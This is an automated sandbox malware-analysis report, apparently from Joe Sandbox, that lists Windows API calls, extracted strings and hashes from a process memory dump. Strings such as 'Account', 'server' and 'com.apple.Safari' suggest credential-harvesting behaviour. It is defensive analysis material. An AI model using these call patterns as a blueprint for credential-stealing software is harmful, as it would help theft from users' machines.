                                                                                              • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$FileModuleName
                                                                                              • String ID:
                                                                                              • API String ID: 3859505661-0
                                                                                              • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                              • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                              • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                              • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                              • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                              • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                              • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3934441357-0
                                                                                              • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                              • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                              • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                              • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                              • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                              • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                              • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                              • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                              • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                              • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                              • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                              • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                              • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                              • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                              • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                              • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                              • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                              • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                              • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                              • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                              • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                              • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                              • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                              • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                              • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnumNamesResource
                                                                                              • String ID:
                                                                                              • API String ID: 3334572018-0
                                                                                              • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                              • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                              • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                              • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                              • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                              • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                              • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 1863332320-0
                                                                                              • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                              • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                              • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                              • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 004095FC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
  • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
  • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
• String ID:
• API String ID: 3655998216-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00445426
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
• String ID:
• API String ID: 1828521557-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: _wcsicmp
• String ID:
• API String ID: 2081463915-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: File$CloseCreateErrorHandleLastRead
• String ID:
• API String ID: 2136311172-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
• ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: ??2@??3@
• String ID:
• API String ID: 1936579350-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• EmptyClipboard.USER32 ref: 004098EC
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
• GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
• GlobalFix.KERNEL32(00000000), ref: 00409927
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
• GlobalUnWire.KERNEL32(00000000), ref: 0040994C
• SetClipboardData.USER32(0000000D,00000000), ref: 00409955
• GetLastError.KERNEL32 ref: 0040995D
• CloseHandle.KERNEL32(?), ref: 00409969
• GetLastError.KERNEL32 ref: 00409974
• CloseClipboard.USER32 ref: 0040997D
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
• String ID:
• API String ID: 2565263379-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
• FreeLibrary.KERNEL32(00000000), ref: 004044E9
• MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: Library$AddressFreeLoadMessageProc
• String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
• API String ID: 2780580303-317687271
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
• String ID:
• API String ID: 4218492932-0
Uniqueness Score: -1.00%

APIs
• EmptyClipboard.USER32 ref: 00409882
• wcslen.MSVCRT ref: 0040988F
• GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
• GlobalFix.KERNEL32(00000000), ref: 004098AC
• memcpy.MSVCRT ref: 004098B5
• GlobalUnWire.KERNEL32(00000000), ref: 004098BE
• SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
• CloseClipboard.USER32 ref: 004098D7
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
• String ID:
• API String ID: 2014503067-0
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32 ref: 004182D7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
• FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
• LocalFree.KERNEL32(?), ref: 00418342
• ??3@YAXPAX@Z.MSVCRT ref: 00418370
  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
• String ID: OsError 0x%x (%u)
• API String ID: 403622227-2664311388
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: ??2@??3@memcpymemset
• String ID:
• API String ID: 1865533344-0
Uniqueness Score: -1.00%

APIs
• NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
Uniqueness Score: -1.00%

APIs
• _wcsicmp.MSVCRT ref: 004022A6
• _wcsicmp.MSVCRT ref: 004022D7
• _wcsicmp.MSVCRT ref: 00402305
• _wcsicmp.MSVCRT ref: 00402333
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
• memset.MSVCRT ref: 0040265F
• memcpy.MSVCRT ref: 0040269B
  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
• memcpy.MSVCRT ref: 004026FF
• LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
• String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
• API String ID: 577499730-1134094380
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
• String ID: :stringdata$ftp://$http://$https://
• API String ID: 2787044678-1921111777
Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003E9), ref: 0041402F
• GetDlgItem.USER32(?,000003E8), ref: 0041403B
• GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
• GetWindowLongW.USER32(?,000000F0), ref: 00414056
• GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
• GetWindowLongW.USER32(?,000000EC), ref: 0041406B
• GetWindowRect.USER32(00000000,?), ref: 0041407D
• GetWindowRect.USER32(?,?), ref: 00414088
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
• GetDC.USER32 ref: 004140E3
• wcslen.MSVCRT ref: 00414123
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
• ReleaseDC.USER32(?,?), ref: 00414181
• _snwprintf.MSVCRT ref: 00414244
• SetWindowTextW.USER32(?,?), ref: 00414258
• SetWindowTextW.USER32(?,00000000), ref: 00414276
• GetDlgItem.USER32(?,00000001), ref: 004142AC
• GetWindowRect.USER32(00000000,?), ref: 004142BC
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
• GetClientRect.USER32(?,?), ref: 004142E1
• GetWindowRect.USER32(?,?), ref: 004142EB
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
• GetClientRect.USER32(?,?), ref: 0041433B
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
• String ID: %s:$EDIT$STATIC
• API String ID: 2080319088-3046471546
Uniqueness Score: -1.00%

APIs
• EndDialog.USER32(?,?), ref: 00413221
• GetDlgItem.USER32(?,000003EA), ref: 00413239
• SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
• SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
• memset.MSVCRT ref: 00413292
• memset.MSVCRT ref: 004132B4
• memset.MSVCRT ref: 004132CD
• memset.MSVCRT ref: 004132E1
• memset.MSVCRT ref: 004132FB
• memset.MSVCRT ref: 00413310
• GetCurrentProcess.KERNEL32 ref: 00413318
• ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
